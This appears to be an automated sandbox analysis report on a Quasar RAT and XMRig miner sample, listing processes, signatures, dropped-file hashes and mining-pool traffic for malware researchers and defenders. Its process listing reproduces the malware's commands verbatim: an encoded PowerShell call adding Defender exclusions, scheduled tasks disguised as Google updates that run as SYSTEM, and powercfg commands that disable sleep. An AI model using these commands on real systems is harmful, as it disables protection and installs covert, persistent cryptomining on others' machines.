Malware Analysis Report

2024-08-06 11:06

Sample ID 230910-ee9yxsfa96
Target ImageLoggerV12.exe
SHA256 427895a73d7150c8f132f251c230ae0686ee0b89e13e46258f40b0de1cc5e638
Tags
quasar xmrig office04 miner spyware trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

427895a73d7150c8f132f251c230ae0686ee0b89e13e46258f40b0de1cc5e638

Threat Level: Known bad

The file ImageLoggerV12.exe was found to be: Known bad.

Malicious Activity Summary

quasar xmrig office04 miner spyware trojan upx

Quasar RAT

Suspicious use of NtCreateUserProcessOtherParentProcess

Quasar payload

xmrig

XMRig Miner payload

Blocklisted process makes network request

UPX packed file

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Program Files directory

Enumerates physical storage devices

Unsigned PE

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious behavior: LoadsDriver

Enumerates processes with tasklist

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Scheduled Task/Job
T1053
Persistence
TA0003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Credential Access
TA0006
Discovery
TA0007
System Information Discovery
T1082
Query Registry
T1012
Peripheral Device Discovery
T1120
Process Discovery
T1057
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2023-09-10 03:52

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-09-10 03:52

Reported

2023-09-10 03:55

Platform

win7-20230831-en

Max time kernel

142s

Max time network

146s

Command Line

C:\Windows\Explorer.EXE

Signatures

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 2492 created 1348 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 2492 created 1348 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 2492 created 1348 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 2492 created 1348 N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe C:\Windows\Explorer.EXE
PID 2256 created 1348 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2256 created 1348 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2256 created 1348 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2256 created 1348 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE
PID 2256 created 1348 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\Explorer.EXE

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\UI.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GC.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Logger.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2256 set thread context of 1196 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 2256 set thread context of 3004 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\cmd.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 00d95c6b9ae3d901 C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mainPannel.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\GC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\System32\cmd.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 796 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 796 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 796 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 796 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 2712 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 2712 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 2712 wrote to memory of 2752 N/A C:\Users\Admin\AppData\Roaming\Logger.exe C:\Users\Admin\AppData\Roaming\Logger.exe
PID 796 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
PID 796 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
PID 796 wrote to memory of 2492 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
PID 796 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\UI.exe
PID 796 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\UI.exe
PID 796 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\UI.exe
PID 796 wrote to memory of 2040 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\UI.exe
PID 796 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\GC.exe
PID 796 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\GC.exe
PID 796 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe C:\Users\Admin\AppData\Local\Temp\GC.exe
PID 1736 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\GC.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\GC.exe C:\Windows\system32\schtasks.exe
PID 1736 wrote to memory of 2892 N/A C:\Users\Admin\AppData\Local\Temp\GC.exe C:\Windows\system32\schtasks.exe
PID 1260 wrote to memory of 688 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 688 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 688 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 1228 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 2280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 2280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 2280 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 2392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 2392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1260 wrote to memory of 2392 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1404 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1404 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1404 wrote to memory of 1276 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1500 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 1500 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 1500 wrote to memory of 2256 N/A C:\Windows\system32\taskeng.exe C:\Program Files\Google\Chrome\updater.exe
PID 332 wrote to memory of 1132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1132 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1140 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 1760 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1452 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1452 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1452 wrote to memory of 1076 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 332 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 332 wrote to memory of 2332 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2256 wrote to memory of 1196 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 2256 wrote to memory of 3004 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\cmd.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe

"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="

C:\Users\Admin\AppData\Roaming\Logger.exe

"C:\Users\Admin\AppData\Roaming\Logger.exe"

C:\Users\Admin\AppData\Roaming\Logger.exe

"C:\Users\Admin\AppData\Roaming\Logger.exe"

C:\Users\Admin\AppData\Local\Temp\mainPannel.exe

"C:\Users\Admin\AppData\Local\Temp\mainPannel.exe"

C:\Users\Admin\AppData\Local\Temp\UI.exe

"C:\Users\Admin\AppData\Local\Temp\UI.exe"

C:\Users\Admin\AppData\Local\Temp\GC.exe

"C:\Users\Admin\AppData\Local\Temp\GC.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {27E97AAA-FFF7-433A-8605-9DBBCBCC20B5} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ooufdlmmm#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp

Files

memory/796-0-0x000007FEF5B10000-0x000007FEF64FC000-memory.dmp

memory/796-1-0x0000000000BF0000-0x0000000004F1C000-memory.dmp

memory/796-2-0x000000001F560000-0x000000001F5E0000-memory.dmp

\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

C:\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

C:\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

C:\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

C:\Users\Admin\AppData\Local\Temp\_MEI27122\python311.dll

MD5 5792adeab1e4414e0129ce7a228eb8b8
SHA1 e9f022e687b6d88d20ee96d9509f82e916b9ee8c
SHA256 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967
SHA512 c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

memory/2580-36-0x000000001B390000-0x000000001B672000-memory.dmp

memory/2580-37-0x0000000001E60000-0x0000000001E68000-memory.dmp

\Users\Admin\AppData\Local\Temp\_MEI27122\python311.dll

MD5 5792adeab1e4414e0129ce7a228eb8b8
SHA1 e9f022e687b6d88d20ee96d9509f82e916b9ee8c
SHA256 7e1370058177d78a415b7ed113cc15472974440d84267fc44cdc5729535e3967
SHA512 c8298b5780a2a5eebed070ac296eda6902b0cac9fda7bb70e21f482d6693d6d2631ca1ac4be96b75ac0dd50c9ca35be5d0aca9c4586ba7e58021edccd482958b

memory/2580-39-0x000007FEF2420000-0x000007FEF2DBD000-memory.dmp

memory/2580-40-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2580-41-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2580-42-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2752-43-0x000007FEEC480000-0x000007FEECA69000-memory.dmp

memory/2580-44-0x00000000026C0000-0x0000000002740000-memory.dmp

memory/2580-45-0x000007FEF2420000-0x000007FEF2DBD000-memory.dmp

\Users\Admin\AppData\Local\Temp\mainPannel.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

C:\Users\Admin\AppData\Local\Temp\mainPannel.exe

MD5 4bcdea1ce4588a550b35ddfd88ffe867
SHA1 79319590abb95dfbbe7ec789d78531655e75a61b
SHA256 ac46c917eecdbe5bfff12244f3e1afbf5c42b2bfd1e46dce854956b5f7230e8e
SHA512 df391b0c10d5857d687a585d875d9189088d6529812643aabca3cfced00eb275edae00e8877fefef30151eb9ba37aafd6ce902261258d46a4fdd7eeb685edc4f

\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

\Users\Admin\AppData\Roaming\Logger.exe

MD5 90a149cf408f4173e445ec61c7c5a418
SHA1 352ec472076c3f48fc2e60e71b50bf5d7fb13bf3
SHA256 bb4bb2995ce6bd5c9f25e4702c678629d31ce621bfb2fbf1a2fd64e4baa70ae2
SHA512 917a1028bfd195f2adf2dd35033c51a3fa40fbecb883b73b2b80d97cccfc51351e54123d0b36f063c9b65d686707ff23dfd0e34cab1112c68e5736fc8bf9c56f

C:\Users\Admin\AppData\Local\Temp\UI.exe

MD5 a6d1f2686c50110de2fd76df4dcb7057
SHA1 75f47ac32fada1bb9371b45006c2b1744347790a
SHA256 ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446
SHA512 f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66

C:\Users\Admin\AppData\Local\Temp\UI.exe

MD5 a6d1f2686c50110de2fd76df4dcb7057
SHA1 75f47ac32fada1bb9371b45006c2b1744347790a
SHA256 ec6c1cb4a88a3a59dbb1a703445bcad065c65e6422504f9278ef5ce9f2a3b446
SHA512 f5e796aedbd79463a303906b2f56af054039ae64f1600f0bbb25f57c7cc2805f1108ac4f7f5def5dd195c1e094444f9f04a8e8acc9d7a5277377de511963aa66

